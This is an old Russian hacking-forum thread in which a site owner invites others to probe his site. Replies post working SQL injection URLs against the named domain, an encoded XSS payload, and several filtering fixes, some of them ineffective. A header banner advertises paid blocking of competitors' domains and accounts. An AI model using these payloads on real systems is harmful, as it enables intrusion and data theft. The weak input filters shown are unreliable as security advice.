F.i.p.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
F.i.p.

Опции темы

Поиск в этой теме

Опции просмотра

F.i.p.

31.08.2007, 23:50

bogus92

Новичок

Регистрация: 03.08.2007

Сообщений: 13

С нами: 9879624

Репутация: 3

F.i.p.

http://fi-people.org.ua
Сайт пока очень сырой, но уязвимости, я думаю найдуться.

𝕏 Twitter Reddit Telegram Копировать ссылку

01.09.2007, 15:25

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

С нами: 10172486

Репутация: 874

Вот пока найдена скуль иньекция.
http://fi-people.org.ua/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*
Очень мало на сайте всего, негде искать!!!

А вот и информация через скуль
http://fi-people.org.ua/view.php?id=-1%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12 ,13%20from%20persons/*

Ну блин.... только что заметил. Версия мускула 5.*.* поэтому можно увидеть инфу из всех таблиц и ничего не нужно подбирать.

Итого: Есть 20 таблиц. Есть таблица admins (правда пока недоступна почемуто) в ней есть поля id,name,password может еще какие я не смотрел. Ну думаю этого хватит.

Последний раз редактировалось Red_Red1; 01.09.2007 в 15:41..

01.09.2007, 16:00

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

С нами: 10243046

Репутация: 3033

SIXSS =)))

http://fi-people.org.ua/view.php?id=-1+union+select+1,0x3c7363726970743e616c65727428277 8737327293c2f7363726970743e,3,4,5,6,7,8,9,10,11,12 ,13/*

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

01.09.2007, 19:22

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,187

С нами: 10495046

Репутация: 2642

Попробуй для устранения SQL-inj использовать

PHP код:


		
			
$_GET = preg_replace('//','',$_GET);

просто прикольный метод... сорри за оффтоп

01.09.2007, 19:37

bogus92

Новичок

Регистрация: 03.08.2007

Сообщений: 13

С нами: 9879624

Репутация: 3

Спасибо всем, кто ответил(всем атплюсовал). А переменные я немного по-дрому фильтровал

$id = urldecode(htmlspecialchars($id = $_POST['id'], ENT_QUOTES));

01.09.2007, 19:49

bogus92

Новичок

Регистрация: 03.08.2007

Сообщений: 13

С нами: 9879624

Репутация: 3

хм... а я хоть добавил репутацию? а то у меня 0 светиться...

01.09.2007, 21:04

bogus92

Новичок

Регистрация: 03.08.2007

Сообщений: 13

С нами: 9879624

Репутация: 3

ЗЫ. Поправил ещё кое-что. Теперь за незатверждённых людей нельзя ни голосовать ни просматривать информацию о них.

02.09.2007, 22:32

Slon

Участник форума

Регистрация: 09.12.2005

Сообщений: 162

С нами: 10746540

Репутация: 91

Цитата:

просто прикольный метод... сорри за оффтоп

intval() помоему удобнее. Сорри за оффтоп)

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules